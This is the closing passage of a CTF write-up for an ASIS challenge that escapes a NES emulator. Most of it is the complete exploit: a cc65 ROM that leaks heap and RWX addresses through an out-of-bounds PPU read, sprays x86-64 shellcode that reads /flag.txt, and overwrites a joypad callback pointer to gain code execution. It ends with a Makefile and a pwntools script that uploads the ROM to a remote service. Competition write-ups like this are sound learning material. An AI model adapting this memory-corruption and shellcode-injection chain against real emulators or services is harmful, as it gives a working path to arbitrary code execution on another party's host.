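print(prgbank, chrbank)

# Furthest index reachable through readCHR with the largest bank value.
max_index = 0xF * 0x2000 + 0x1FFF
print(hex(max_index))
```

Keeping the low two bits at zero leaves prgbank at 0, and the four-bit chrbank field limits the read window to 0x20000 bytes from the start of the CHR data.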

From there, I just had to calculate the offsets for the function pointer and the heap and change them.

Flag: ASIS{e8a46ded54d3acec15419e6b09818901}

Another good lesson in thinking about all possible attack patterns, instead of focusing on the first one I find.

Summary

What I learned

I learned a bit about how some addresses are treated as special by the CPU and trigger bus reads and writes. This is something I want to dig into more, as it was cool to see it in action. I also learned a lot about the 6502 instruction set, which was surprisingly interesting. It’s crazy how much computers have improved over the last 40 years.

Most importantly, I learned to check for all possible reads and writes, instead of focusing only on what’s readily available. If I had spent more time looking at the PPU, I think I may have been able to find the OOB read. In reality, I hardly glanced at the cartridge mappers during the competition.

Overall I really enjoyed the challenge, and it was also fun to continue working on it after the CTF had finished!

FULL CODE


//pwn.c
#include <stdint.h>

extern void bka(uint8_t a);
extern void bkx(uint8_t a);

#define REMOTE

#define HEAP_LIBC_PAGE 0x4
#define HEAP_LIBC_OFF 0x1E50

#ifdef REMOTE
#define M_RAM_OFF 0x551f0
#define FUNC_OVERWRITE_OFF 0x3EB9D8
#endif
#ifndef REMOTE
#define M_RAM_OFF 0x553e0
#define FUNC_OVERWRITE_OFF 0x3FB108
#endif
#define DREAM_OFF 0xA2D60
#define LD_PAGE 0x1
#define LD_OFF 0x3f0
#define HEAP_OFF 0x3d0
#define RWX_OFF 0x3000
#define LIBC_OFF 0x217000
#define SYSTEM_OFF 0x28670
#define JOYCON_CB_RWX_DIFF 0x62D79
#define SHELLCODE_SZ 0x4a
#define SPRAY_CNT 3

enum IORegisters
{
    PPUCTRL = 0x2000,
    PPUMASK,
    PPUSTATUS,
    OAMADDR,
    OAMDATA,
    PPUSCROL,
    PPUADDR,
    PPUDATA,
    OAMDMA = 0x4014,
    PUTC = 0x4015,
    JOY1 = 0x4016,
    JOY2 = 0x4017,
};

/*[*] 0x30: 0x00007f69a1cdc3e8 0x00007ffe928407e0
[*] 0x40: 0x000000010000000b 0x0000000000000000
[*] 0x50: 0x00007ffe92840610 0x0000000000000000
[*] 0x60: 0x00007f69a1cb26b4 0x00007f69a1cb268d
*/
/*
0000000000000000 <_start>:
   0:   48 31 d2                xor    %rdx,%rdx
   3:   48 31 c0                xor    %rax,%rax
   6:   48 31 f6                xor    %rsi,%rsi
   9:   48 bb 6c 6f 6c 6c 6f    movabs $0x746c6c6f6c6c6f6c,%rbx
  10:   6c 6c 74
  13:   48 c1 eb 38             shr    $0x38,%rbx
  17:   53                      push   %rbx
  18:   48 bb 2f 66 6c 61 67    movabs $0x78742e67616c662f,%rbx
  1f:   2e 74 78
  22:   53                      push   %rbx
  23:   48 89 e7                mov    %rsp,%rdi
  26:   b0 02                   mov    $0x2,%al
  28:   0f 05                   syscall
  2a:   48 89 c7                mov    %rax,%rdi
  2d:   48 31 c0                xor    %rax,%rax
  30:   48 89 e6                mov    %rsp,%rsi
  33:   ba 00 01 00 00          mov    $0x100,%edx
  38:   0f 05                   syscall
  3a:   48 89 c2                mov    %rax,%rdx
  3d:   b8 01 00 00 00          mov    $0x1,%eax
  42:   bf 01 00 00 00          mov    $0x1,%edi
  47:   0f 05                   syscall
*/
//aligned to 0x10, necessary
uint8_t shellcode[] = { 0x90,
    0x48,0x31,0xd2,0x48,0x31,0xc0,0x48,0x31,
    0xf6,0x48,0xbb,0x6c,0x6f,0x6c,0x6c,0x6f,
    0x6c,0x6c,0x74,0x48,0xc1,0xeb,0x38,0x53,
    0x48,0xbb,0x2f,0x66,0x6c,0x61,0x67,0x2e,
    0x74,0x78,0x53,0x48,0x89,0xe7,0xb0,0x02,
    0x0f,0x05,0x48,0x89,0xc7,0x48,0x31,0xc0,
    0x48,0x89,0xe6,0xba,0x00,0x01,0x00,0x00,
    0x0f,0x05,0x48,0x89,0xc2,0xb8,0x01,0x00,
    0x00,0x00,0xbf,0x01,0x00,0x00,0x00,0x0f,
    0x05,0x00,0x00,0x00,0x00,0x00,0x00,};

uint8_t pattern[] = {0x64,0x4c,0x8b,0x1c,0x25,0x28,0xff,0xff,0xff,0x41,0xff,0xa3,0x18,0x3c,0x00,0x00}; //the bytes found in libc

void reset() {
  //bka(0); bka(0); bka(0); bka(0);
  bka(0); bka(0); bka(0); bka(0);
}

void sub64(uint32_t al, uint32_t ah, uint32_t bl, uint32_t bh,
           uint32_t *xl, uint32_t *xh) {
  *xl = al - bl;
  if (al < bl) {
    *xh = ah - bh - 1;
  } else {
    *xh = ah - bh;
  }
}

void xorAt64(uint32_t ofs_low, uint32_t ofs_high, uint8_t value) {
  int i;
  for (i = 0; i < 4; i++) bka((ofs_high >> ((3-i)*8)) & 0xff);
  for (i = 0; i < 4; i++) bka((ofs_low >> ((3-i)*8)) & 0xff);
  bkx(value);
  reset();
}

void xorAt(uint32_t offset, uint8_t value) {
  int i;
  for (i = 0; i < 4; i++) bka((offset >> ((3-i)*8)) & 0xff);
  bkx(value);
  reset();
}

void putchar(uint8_t c) {
  *(uint8_t*)(0x4015) = c;
}

uint8_t get_data(uint16_t addr){
    uint8_t a = (addr >> 8) & 0xff, b = addr &0xff;
    *(uint8_t*)(PPUADDR) = a;
    *(uint8_t*)(PPUADDR) = b;
    return *(uint8_t*)PPUDATA;
}


//void set_ppu_data(uint8_t chef){
//    *(uint8_t*)PPUDATA = chef;
//}
//
//uint8_t libc_addr[8];

void leak(uint16_t offset, uint32_t* high, uint32_t* low){
    uint8_t i = 0;
    get_data(0);
    for(i = 0; i < 4; i++)
        *low |= (uint32_t)get_data(offset+i+1)<<(i*8);
    for(i = 0; i < 4; i++)
        *high |= (uint32_t)get_data(offset+i+5)<<(i*8);
    get_data(0);
}

void log64(uint32_t high, uint32_t low){
    uint8_t i = 0;
    putchar(0x46);
    putchar(0x46);
    for(i = 0; i < 4; i++)
        putchar((low >> (i*8)) & 0xFF);
    for(i = 0; i < 4; i++)
        putchar((high >> (i*8)) & 0xFF);
    putchar(0x41);
    putchar(0x42);
    putchar(0x43);
}

void dump(uint32_t base){
    uint8_t i;
    for(i = 0; i < 0xff; i++){
        xorAt(base+i, 0);
    }
    xorAt(base+0xff, 0);
}

void debug(){
    while(1) *(uint8_t*)JOY1 = 1;
}

void redemption(){
    *(uint8_t*)0x9001 = 0x10;
}

int main(void) {
    uint32_t rwx_low, rwx_high;
    uint32_t mram_low, mram_high;
    uint32_t mram_rwx_off_low, mram_rwx_off_high;
    uint32_t joycon_cb_fn_low, overwrite;
    uint8_t i,j;

    //debug();

    //xorAt64(DREAM_OFF+0x1c, 0, LD_PAGE & 0xff);
    redemption();


    rwx_low = rwx_high = 0;
    leak(LD_OFF, &rwx_high, &rwx_low);
    rwx_low -= RWX_OFF;
    rwx_low &= 0xFFFFFF00;

    mram_low = mram_high = 0;
    leak(HEAP_OFF, &mram_high, &mram_low);
    mram_low -= M_RAM_OFF; //set the heap leak to m_RAM

    log64(rwx_high, rwx_low);
    log64(mram_high, mram_low);

    sub64(rwx_low, rwx_high, mram_low, mram_high, &mram_rwx_off_low, &mram_rwx_off_high);
    log64(mram_rwx_off_high, mram_rwx_off_low);

    //prep shellcode with the pattern found at rwx section
    for(i = 0; i < SHELLCODE_SZ; i++)
        shellcode[i] ^= pattern[i%0x10];

    
    //create nop
    for(i = 0; i < 0x10; i++)
        pattern[i] ^= 0x90;

    for(j = 0; j < SPRAY_CNT;j++){
        for(i = 0; i < 0xb0; i++){
            xorAt64(mram_rwx_off_low+i, mram_rwx_off_high, pattern[i%0x10]);
        }
        mram_rwx_off_low+= 0xb0;
            //write shellcode
        for(i = 0; i < SHELLCODE_SZ; i++)
            xorAt64(mram_rwx_off_low+i, mram_rwx_off_high, shellcode[i]);
        mram_rwx_off_low += 0x50;
    }
    mram_rwx_off_low -= SPRAY_CNT*0x100;

    //for finding Mapper allocation on blind remote
#ifdef DUMP
    putchar(0x44);
    putchar(0x44);
    for(i = 0; i < 8; i++)
        dump(FUNC_OVERWRITE_OFF + i*0x100);
    putchar(0x45);
    putchar(0x45);
#endif

    //overwrite callback function
    overwrite = rwx_low;
    joycon_cb_fn_low = rwx_low - JOYCON_CB_RWX_DIFF;
    overwrite ^= joycon_cb_fn_low;
    overwrite |= 0x800;
    for(i = 0; i < 4; i++)
        xorAt64(FUNC_OVERWRITE_OFF+i, 0, (overwrite >> (i*8)) & 0xFF);
    

    putchar(0x47);
    putchar(0x47);
    putchar(0x47);
    putchar(0x47);
    putchar(0x47);
    //trigger
    *(uint8_t*)JOY1 = i;
    while(1);
    return 0;
}

;pwn_asm.s
    .export _bka
    .export _bkx
    .export _nop

_bka:
    .byte $13
    rts

_bkx:
    .byte $37
    rts

_nop:
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    rts

;shellcode source (NASM syntax)
section .text
    global _start

_start:
;rd_only
    xor     rdx, rdx
    xor     rax, rax
    xor     rsi, rsi
    mov     qword rbx, 'lollollt'
    shr     rbx, 0x38
    push    rbx
    mov     qword rbx, '/flag.tx'
    push    rbx
    ;filename now in rdi
    mov     rdi, rsp
    mov     al, 0x2
    syscall
    mov     rdi, rax
    xor     rax, rax
    mov     rsi, rsp
    mov     rdx, 0x100
    syscall
    mov     rdx, rax
    mov     rax, 1
    ;stdout
    mov     rdi, 1
    syscall

# Makefile
all:
	cc65 -O -t c64 pwn.c
	ca65 -t c64 pwn.s
	ca65 -t c64 pwn_asm.s
	cl65 -o ../pwn.nes -t nes pwn.o pwn_asm.o

#!/usr/bin/env python
# upload.py

from pwn import *
from binascii import hexlify
import os

stop = 0x3F3280
offset = 0x3A0000 #checked up to 0x100000 on remote
r = 0

def spawn_remote():
    global r
    #r = remote("91.107.157.58", 3000)
    r = remote("localhost", 1337)

def leak():
    data = r.recvuntil(b"FF", drop=True).decode("utf-8").strip()
    if data:
        print(data)
    data = r.recvuntil(b"ABC",drop=True)
    return u64(data)

def dump():
    i = 0
    print(r.recvuntil(b"DD",drop=True))
    temp = r.recvuntil(b"EE",drop=True)
    print(len(temp))
    data = b''
    for i,b in enumerate(temp):
        if not i%2:
            data += b.to_bytes(1, 'little')

    i = 0
    print(len(data))
    while(i < 0x800):
        lol = u64(data[i:i+8])
        lol2 = u64(data[i+8:i+0x10])
        log.info(f'{hex(i+offset)}: {lol:#0{18}x} {lol2:#0{18}x}')
        if lol == 0x10000000b and lol2 == 0:
            #signature matched; stop so the offset can be read from the log
            raise SystemExit(1)
        i += 0x10

def templated(offset):
    log.info(f"offset: {hex(offset)}")
    pwn_code = ""
    with open("./rom/template.c", "r") as pwn:
        pwn_code = pwn.read()

    pwn_code = pwn_code.replace('XDOFFSET', f'{offset:#0{8}x}')

    with open("./rom/pwn.c", "w") as pwn:
        pwn.write(pwn_code)

def main():
    global r
    global offset
    #for remote enumeration
    #templated(offset)

    os.chdir("./rom")
    os.system("make all")
    os.chdir("..")
    spawn_remote()

    with open("./pwn.nes", "rb") as f:
        data = list(f.read())

        #patch in dream mapper
        data[6] = (data[6] & 0x0f) | (11 << 4) 

        to_send = hexlify(bytes(data))
        #log.info(f"sending data> {to_send}")

        r.sendlineafter(b':\n', to_send)

        with open("./test.nes", "wb") as out:
            out.write(bytes(data))


    #dump()
    data = leak()
    log.info(f'rwx: {hex(data)}')
    data = leak()
    log.info(f'm_RAM: {hex(data)}')
    data = leak()
    log.info(f'm_RAM_rwx_off: {hex(data)}')
    r.interactive()
    r.close()
    offset += 0x800

if __name__ == "__main__":
    main()
#r.sendlineafter(b'GGGGG','ls')